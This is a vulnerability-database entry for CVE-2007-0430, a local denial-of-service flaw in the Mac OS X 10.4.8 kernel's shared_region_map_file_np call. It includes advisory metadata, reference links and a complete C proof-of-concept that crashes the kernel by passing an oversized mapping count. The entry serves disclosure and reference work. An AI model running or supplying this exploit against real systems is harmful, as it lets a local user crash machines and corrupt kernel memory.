Apple Mac OS Kernel shared_region_map_file_np() Denial of Service Vulnerability

Vulnerability ID 1112056 Vulnerability type Unknown
Published 2007-01-21 Updated 2007-01-22
CVE ID CVE-2007-0430 CNNVD-ID CNNVD-200701-357
Platform OSX CVSS score 4.9
|Vulnerability Source
https://www.exploit-db.com/exploits/3167
https://www.securityfocus.com/bid/81986
https://cxsecurity.com/issue/WLB-2007010093
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-357
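|Vulnerability Details
The shared_region_map_file_np function in the kernel of Apple Mac OS X 10.4.8 and earlier contains a denial-of-service vulnerability. A local user can cause a denial of service (memory corruption) via a large mappingCount value.
|Exploit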
/*
This vulnerability was discovered by Adriano Lima
<adriano@risesecurity.org>.

REFERENCES

[1] Mac OS X Internals: A Systems Approach By Amit Singh

DISCLAIMER

The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in this
document. Liability claims regarding damage caused by the use of any
information provided, including any kind of information which is incomplete
or incorrect, will therefore be rejected.
*/


#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(int argc,char **argv){
   int fd;

   if((fd=open("/usr/lib/libSystem.dylib",O_RDONLY))==-1){
       perror("open");
       exit(EXIT_FAILURE);
   }

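   /* Second argument is mappingCount; the large value is the trigger
      described in the vulnerability details above. */
   if(syscall(SYS_shared_region_map_file_np,fd,0x02000000,NULL,NULL)==-1){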
       perror("shared_region_map_file_np");
       exit(EXIT_FAILURE);
   }

   exit(EXIT_FAILURE);
}

// milw0rm.com [2007-01-21]
|Affected Products
Apple Mac OS X 10.4.8
|References

Source: BUGTRAQ
Name: 20070119 [RISE-2007001] Apple Mac OS X 10.4.x kernel shared_region_map_file_np() memory corruption vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/457466/100/0/threaded
Source: XF
Name: macos-sharedregionmapfilenp-dos(31645)
Link: http://xforce.iss.net/xforce/xfdb/31645
Source: OSVDB
Name: 32942
Link: http://www.osvdb.org/32942
Source: VUPEN
Name: ADV-2007-0275
Link: http://www.frsirt.com/english/advisories/2007/0275
Source: SECTRACK
Name: 1017538
Link: http://securitytracker.com/id?1017538
Source: SREASON
Name: 2178
Link: http://securityreason.com/securityalert/2178
Source: SECUNIA
Name: 23823
Link: http://secunia.com/advisories/23823
Source: MISC
Link: http://risesecurity.org/advisory.php?id=RISE-2007001.txt